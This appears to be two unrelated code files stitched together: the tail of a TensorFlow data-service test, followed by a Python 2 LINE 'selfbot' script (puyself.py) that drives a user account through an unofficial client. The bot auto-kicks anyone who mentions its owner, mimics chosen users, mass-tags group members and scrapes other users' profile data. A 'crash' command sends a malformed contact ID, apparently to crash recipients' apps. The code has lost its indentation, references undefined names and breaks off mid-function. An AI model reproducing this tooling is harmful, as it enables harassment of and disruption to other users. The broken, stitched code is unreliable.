@combinations.generate(test_base.eager_only_combinations())
def testTwoLevelDistribute(self):
cluster_1_size = 3
dispatcher_1, workers_1 = self.start_cluster( # to avoid gcing workers, pylint: disable=unused-variable
cluster_1_size,
name="cluster_1")
dispatcher_2, workers_2 = self.start_cluster(1, name="cluster_2") # to avoid gcing workers, pylint: disable=unused-variable
num_sizes = 10
size_repeats = 5
strings = ["a" * i for i in range(num_sizes)] * size_repeats
ds = dataset_ops.Dataset.from_tensor_slices(strings)
ds = ds.shuffle(len(strings))
ds = _make_distributed_dataset(ds, dispatcher_1)
# Large enough so that all strings of the same size are windowed together.
window_size = cluster_1_size * size_repeats
batch_size = size_repeats
def key_func(x):
return math_ops.cast(string_ops.string_length_v2(x), dtypes.int64)
ds = ds.apply(
grouping.group_by_window(
key_func=key_func,
reduce_func=lambda _, x: x.batch(batch_size),
window_size=window_size))
ds = _make_distributed_dataset(ds, dispatcher_2)
it = iter(ds)
for _ in range(num_sizes):
element = next(it).numpy()
for _ in range(1, cluster_1_size):
self.assertAllEqual(next(it).numpy(), element)
self.assertEmpty(list(it))
if __name__ == "__main__":
test.main()
|
puyself.py
|
# -*- coding: utf-8 -*-
import PUY
from PUY.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile, shutil  # shutil is used by sendAudioWithURL below
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
#from gtts import gTTS
from googletrans import Translator
#DON'T FORGET => sudo pip install bs4 => sudo pip install BeautifulSoup => sudo pip install urllib
cl = PUY.LINE()
cl.login(qr=True)
cl.loginResult()
print "\n[CIE BERHASIL LOGIN]"
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg ="""╠═════════════════
╠-> google (text)
╠-> playstore (text)
╠-> instagram (username)
╠-> wikipedia (text)
╠-> idline (text)
╠-> time
╠-> image (text)
╠-> runtime
╠-> Restart
╠-> lirik (text)
╠-> Mention
╠-> Lurk on/off
╠-> Lurkers
╠-> protect on/off
╠-> qr on/off
╠-> invite on/off
╠-> Cancel on/off
╠-> Simisimi:on/off
╠-> Read on/off
╠-> Getinfo @
╠-> Getcontact @
╠-> ulti @
╠-> speed
╠-> Friendlist
╠-> id@en
╠-> en@id
╠-> id@jp\n 「OR」\n╠-> helppro\n╠-> helpself\n╠-> helpset\n╠-> helpgrup\n╠-> helptranslate
╚═════════════════"""
helppro ="""
╠═════════════════
╠➩ protect on/off
╠➩ qr on/off
╠➩ invite on/off
╠➩ cancel on/off
╚═════════════════"""
helpself ="""
╠═════════════════
╠➩Me
╠➩Myname:
╠➩Mybio:
╠➩Mypict
╠➩Mycover
╠➩My copy @
╠➩My backup
╠➩Getgroup image
╠➩Getmid @
╠➩Getprofile @
╠➩Getinfo @
╠➩Getname @
╠➩Getbio @
╠➩Getpict @
╠➩Getcover @
╠➩Mention
╠➩setpoint on/off
╠➩viewlastseen
╠➩Micadd @
╠➩Micdel @
╚═════════════════"""
helpset ="""
╠═════════════════
╠->contact on/off
╠->autojoin on/off
╠->auto leave on/off
╠->autoadd on/off
╠->like friend
╠->link on
╠->respon on/off
╠->read on/off
╠->simisimi on/off
╚═════════════════"""
helpgrup ="""
╠═════════════════
╠->Link on
╠->Url
╠->Cancel
╠->Gcreator
╠->Kick @
╠->Ulti @
╠->Gname:
╠->Gbroadcast:
╠->Cbroadcast:
╠->Infogrup
╠->Gruplist
╠->Friendlist
╠->Blacklist
╠->Ban @
╠->Unban @
╠->Clearban
╠->Banlist
╠->Contact ban
╠->Midban
╚═════════════════"""
helptranslate ="""
╠═════════════════
╠->Id@en
╠->En@id
╠->Id@jp
╠->Jp@id
╠->Id@th
╠->Th@id
╠->Id@ar
╠->Ar@id
╠->Id@ko
╠->Ko@id
╠->Say-id
╠->Say-en
╠->Say-jp
╚═════════════════"""
KAC=[cl]
mid = cl.getProfile().mid
Bots=[mid]
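# Global feature toggles for the selfbot; the message handlers below flip these
# flags (protection, auto-add, auto-join, clock-in-name, etc.) at runtime.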
wait = {
"likeOn":False,
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":True,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":5},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"""Thx for add""",
"lang":"JP",
"comment":"",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames":"",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
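# State for the mimic/copy feature: when "status" is on, messages from mids
# listed in "target" are echoed back by the bot (see the op.type == 26 handler
# in bot() below).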
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib.request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
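# Builds a single "tag all" message: for each mid in `nama` it appends an "@x"
# placeholder line to the text and a matching MENTIONEES entry (character
# offsets plus the mid) in the MENTION contentMetadata, then sends it as one
# message.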
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
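# Formats a duration in seconds as "HH Jam MM Menit SS Detik"
# (hours/minutes/seconds, Indonesian), presumably for the runtime/uptime reply.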
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string == texX + command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
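# Main operation handler for the long-poll loop. Dispatches on op.type: new
# contacts get the auto-add greeting, being kicked blacklists the kicker, room
# invites are auto-left, and message operations (op.type 25/26) drive the
# command handling below.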
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8'))
if msg.contentMetadata is not None and 'MENTION' in msg.contentMetadata:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Don't Tag Me! iam Bussy!, ",cName + "Ada perlu naon, ?",cName + " pc aja klo urgent! sedang sibuk,", "kenapa, ", cName + " kangen?","kangen bilang gausa tag tag, " + cName, "knp?, " + cName, "apasi?, " + cName + "?", "pulang gih, " + cName + "?","aya naon, ?" + cName + "Tersummon -_-"]
ret_ = "." + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if msg.contentMetadata is not None and 'MENTION' in msg.contentMetadata:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Puy lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., ", "Tersummon -_-, "]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
cl.sendText(msg.to,"Error")
wait['invite'] = False
break
#if msg.contentType == 13:
# if wait["steal"] == True:
# _name = msg.contentMetadata["displayName"]
# copy = msg.contentMetadata["mid"]
# groups = cl.getGroup(msg.to)
# pending = groups.invitee
# targets = []
# for s in groups.members:
# if _name in s.displayName:
# print "[Target] Stealed"
# break
# else:
# targets.append(copy)
# if targets == []:
# pass
# else:
# for target in targets:
# try:
# cl.findAndAddContactsByMid(target)
# contact = cl.getContact(target)
# cu = cl.channel.getCover(target)
# path = str(cu)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
# cl.sendText(msg.to,"Profile Picture " + contact.displayName)
# cl.sendImageWithURL(msg.to,image)
# cl.sendText(msg.to,"Cover " + contact.displayName)
# cl.sendImageWithURL(msg.to,path)
# wait["steal"] = False
# break
# except:
# pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Nothing")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Not in Blacklist")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpmsg)
else:
cl.sendText(msg.to,helpmsg)
elif msg.text.lower() == 'help protect':
if wait["lang"] == "JP":
cl.sendText(msg.to,helppro)
else:
cl.sendText(msg.to,helppro)
elif msg.text.lower() == 'help self':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpself)
else:
cl.sendText(msg.to,helpself)
elif msg.text.lower() == 'help grup':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpgrup)
else:
cl.sendText(msg.to,helpgrup)
elif msg.text.lower() == 'help set':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpset)
else:
cl.sendText(msg.to,helpset)
elif msg.text.lower() == 'help translate':
if wait["lang"] == "JP":
cl.sendText(msg.to,helptranslate)
else:
cl.sendText(msg.to,helptranslate)
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "「Come Here」")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
elif msg.text.lower() == 'crash':
msg.contentType = 13
msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"}
cl.sendMessage(msg)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif ".fb" in msg.text:
a = msg.text.replace(".fb","")
b = urllib.quote(a)
cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses")
cl.sendText(msg.to, "https://www.facebook.com" + b)
cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses")
#========================== FOR COMMAND BOT STARTING =============================#
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protecion Already On")
else:
cl.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protecion Already On")
else:
cl.sendText(msg.to,"Protecion Already On")
elif msg.text.lower() == 'qr on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already On")
else:
cl.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already On")
else:
cl.sendText(msg.to,"Protection Qr already On")
elif msg.text.lower() == 'invite on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite already On")
else:
cl.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
elif msg.text.lower() == 'cancel on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
elif msg.text.lower() == 'protect off':
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection already Off")
else:
cl.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
cl.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
elif msg.text.lower() == 'qr off':
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already off")
else:
cl.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already Off")
else:
cl.sendText(msg.to,"Protection Qr already Off")
elif msg.text.lower() == 'invit off':
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite already Off")
else:
cl.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite already Off")
else:
cl.sendText(msg.to,"Protection Invite already Off")
elif msg.text.lower() == 'cancel off':
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Cancel already Off")
else:
cl.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Cancel already Off")
else:
cl.sendText(msg.to,"Protection Cancel already Off")
elif "Grup cancel:" in msg.text:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
cl.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar")
else:
cl.sendText(msg.to,"Weird value")
elif msg.text.lower() == 'autoleave on':
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
elif msg.text.lower() == 'autoleave off':
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
elif msg.text.lower() == 'share on':
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
elif msg.text.lower() == 'share off':
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
elif msg.text.lower() == 'status':
md = ""
if wait["contact"] == True: md+="Contact:on \n"
else: md+="Contact:off\n"
if wait["autoJoin"] == True: md+="Auto Join:on \n"
else: md +="Auto Join:off\n"
if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel:off \n"
if wait["leaveRoom"] == True: md+="Auto leave:on \n"
else: md+="Auto leave:off \n"
if wait["timeline"] == True: md+="Share:on \n"
else:md+="Share:off \n"
if wait["autoAdd"] == True: md+="Auto add:on \n"
else:md+="Auto add:off \n"
if wait["protect"] == True: md+="Protect:on \n"
else:md+="Protect:off \n"
if wait["linkprotect"] == True: md+="Link Protect:on \n"
else:md+="Link Protect:off \n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on \n"
else:md+="Invitation Protect:off \n"
if wait["cancelprotect"] == True: md+="Cancel Protect:on \n"
else:md+="Cancel Protect:off \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"}
cl.sendMessage(msg)
elif msg.text.lower() == 'autoadd on':
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
elif msg.text.lower() == 'autoadd off':
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
elif "Pesan set:" in msg.text:
wait["message"] = msg.text.replace("Pesan set:","")
cl.sendText(msg.to,"We changed the message")
elif msg.text.lower() == 'pesan cek':
if wait["lang"] == "JP":
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di")
else:
cl.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Comment Actived")
else:
cl.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off")
else:
cl.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklist")
else:
cl.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
